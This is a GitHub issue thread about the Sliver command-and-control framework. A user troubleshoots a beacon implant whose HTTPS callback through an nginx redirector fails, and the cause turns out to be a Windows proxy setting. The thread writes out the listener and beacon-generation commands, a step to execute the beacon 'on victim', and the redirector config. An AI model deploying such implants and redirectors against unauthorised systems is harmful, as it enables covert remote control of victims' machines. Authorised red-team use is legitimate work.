### ISSUE TITLE
Beacon call back not working in 1.5.41

### ISSUE THREAD

**Issue by PhilMalle** [BishopFox/sliver#1348]
**Describe the bug**
when generating the beacon mit http, i did not receive the callback over the nginx redirector. 

With version 1.5.39 it was working. 

**To Reproduce**
1. Start https listener: https --lport 1338
2. Generate Beacon: generate beacon --http https://192.168.3.135 --debug
3. Exectue the beacon on victim. 

**Expected behavior**
The expected behavior should be that the callback is comming to the sliver server over the Redirector. 

**Screenshots**
![image](https://github.com/BishopFox/sliver/assets/20696415/b0896370-952b-4909-95e2-e15e2f3f64e8)

These are the error message i got when executing the beacon on the victim. 

with the old version it was possible to geht the callback with this settings. 

**Desktop (please complete the following information):**
 - Ubuntu
 - 22.04

**Additional context**
Redirector has nginx version 1.18.0 installed and is listening on port 443. Proxy_pass is configured to the sliver teamserver.

**Comment by rkervella** [comment]
I cannot reproduce with v1.5.41. Can you share your nginx config?

**Comment by PhilMalle** [comment]
sure, 

this is my config form the c2domain.com file: 
```
server {  
  listen 443 ssl;  
  listen [::]:443 ssl;
  include snippets/self-signed.conf;
  include snippets/ssl-params.conf;
  ssl on;  
  server_name _;  
  root /var/www/eventually;  
  index index.html index.htm index.nginx-debian.html;  
          
  location / { 

  proxy_pass https://172.16.10.116:1338;
  try_files $uri $uri/ =200;  
  }  
  location ~ /\.ht {  
    deny all;  
  }  
}
```

**Comment by PhilMalle** [comment]
ok, i found it why it is not working. 

it was my foult. for some reason i have enabled automatically detect proxy settings in Windows. 

When i turn it off, the call back works. 

sorry for that :) 

Gr33tings
